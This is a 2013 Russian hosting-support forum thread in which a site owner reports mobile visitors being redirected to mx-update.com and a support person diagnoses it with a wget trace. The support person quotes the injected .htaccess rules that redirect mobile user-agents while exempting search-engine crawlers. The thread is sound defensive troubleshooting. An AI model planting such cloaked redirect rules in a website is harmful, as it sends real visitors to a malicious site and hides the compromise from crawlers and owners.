Страница 1 из 1
Домены / Общие вопросы по доменам
Добавлено: 2013-02-24, 12:27:41
slavasl
Здраствуйте,снова проблема с доменом.Я по поводу неё уже обращался,но мне сказали,что проблема в коде сайта и т.д. Но в коде ничего такого нет. Суть проблемы в том,что заходя на сайт oldsource-rus.ru с телефона будь то главная страница,будь то форума,любая...его перенаправляет на заражённый сайт _http://mx-update.com/ Причём такая проблема не только у моего сайта,а также у сайтов lovezoo.in , erik-art.ru , roditeli-i-deti.ru , sarmo.ru которые хостятся у вас.
http://google.com/safebrowsing/diagnostic?site=AS:42484 Всё это можно посмотреть тут. Проблема на самом деле серьёзная. Прошу разобраться с этим и помочь.
Всё,что написано выше писал в тикете,направили сюда. Если мне снова скажут проблема в коде сайта и т.д. я не знаю,что уже отвечу.
Re: Домены / Общие вопросы по доменам
Добавлено: 2013-02-24, 13:12:15
lissyara
какой юзер-агент у браузера телефона?
Re: Домены / Общие вопросы по доменам
Добавлено: 2013-02-24, 13:21:10
lissyara
да, действительно есть такое:
Код: Выделить всё
dc7700p$ wget -S --user-agent="Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone; 240x320)" oldsource-rus.ru
--2013-02-24 13:17:58-- http://oldsource-rus.ru/
Распознаётся oldsource-rus.ru (oldsource-rus.ru)... 91.227.16.12
Подключение к oldsource-rus.ru (oldsource-rus.ru)|91.227.16.12|:80... соединение установлено.
HTTP-запрос отправлен. Ожидание ответа...
HTTP/1.1 302 Found
Server: nginx/1.2.7
Date: Sun, 24 Feb 2013 09:17:58 GMT
Content-Type: text/html; charset=iso-8859-1
Content-Length: 362
Connection: keep-alive
Keep-Alive: timeout=20
Location: http://mx-update.com/u/107
Адрес: http://mx-update.com/u/107 [переход]
--2013-02-24 13:17:58-- http://mx-update.com/u/107
Распознаётся mx-update.com (mx-update.com)... 91.202.63.148
Подключение к mx-update.com (mx-update.com)|91.202.63.148|:80... соединение установлено.
HTTP-запрос отправлен. Ожидание ответа...
HTTP/1.1 302 Found
Server: nginx
Date: Sun, 24 Feb 2013 09:17:58 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Status: 302
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.15
Location: http://mx-update.com/
X-UA-Compatible: IE=Edge,chrome=1
Cache-Control: no-cache
Set-Cookie: _production_session=920479d331ce2d44cd16f9fa8c85a019; path=/; HttpOnly
X-Request-Id: 92e5d1d69773209bfff5fb0451439698
X-Runtime: 0.012292
X-Rack-Cache: miss
Адрес: http://mx-update.com/ [переход]
--2013-02-24 13:17:58-- http://mx-update.com/
Повторное использование соединения с mx-update.com:80.
HTTP-запрос отправлен. Ожидание ответа...
HTTP/1.1 200 OK
Server: nginx
Date: Sun, 24 Feb 2013 09:17:59 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
Status: 200
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.15
X-UA-Compatible: IE=Edge,chrome=1
ETag: "3a2c794a3ce9cdb7a020ddd275f7eb75"
Cache-Control: must-revalidate, private, max-age=0
X-Request-Id: cc0f2f098d1e1cecc1e003ec97e2e668
X-Runtime: 0.029279
X-Rack-Cache: miss
Длина: нет данных [text/html]
Сохранение в каталог: ««index.html.7»».
[ <=> ] 1 696 --.-K/s за 0s
2013-02-24 13:17:59 (58,0 MB/s) - «index.html.7» saved [1696]
dc7700p$
что характерно, указания что обработка была через php нету, значит смотрим .htaccess и там видим:
Код: Выделить всё
RewriteCond %{HTTP_USER_AGENT} (android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|ppc|smartphone|blackberry|mtk|bada|windows\ phone) [NC]
RewriteCond %{HTTP_USER_AGENT} !(accoona|ia_archiver|antabot|ask\ jeeves|baidu|dcpbot|eltaindexer|feedfetcher|gamespy|gigabot|googlebot|gsa-crawler|grub-client|gulper|slurp|mihalism|msnbot|worldindexer|ooyyo|pagebull|scooter|w3c_validator|jigsaw|webalta|yahoofeedseeker|yahoo!\ slurp|mmcrawler|yandexbot|yandeximages|yandexvideo|yandexmedia|yandexblogs|yandexaddurl|yandexfavicons|yandexdirect|yandexmetrika|yandexcatalog|yandexnews|yandeximageresizer) [NC]
RewriteRule (.*) http://mx-update.com/u/107 [L,R=302]
откуда там это взялось - виднее вам - вирусы на вашем компьютере, слишком простой пароль от заказа хостинга, дырки в слишком старом движке сайта...
Re: Домены / Общие вопросы по доменам
Добавлено: 2013-02-24, 15:11:23
slavasl
Спасибо большое за помощь.
Этот файл мне просто удалить надо или удалить ссылку из него,чтобы исправить проблему?
Re: Домены / Общие вопросы по доменам
Добавлено: 2013-02-24, 15:16:34
lissyara
завичит от того, нужен ли он для работы вай ЦМС
как минимум - удалить указанные строки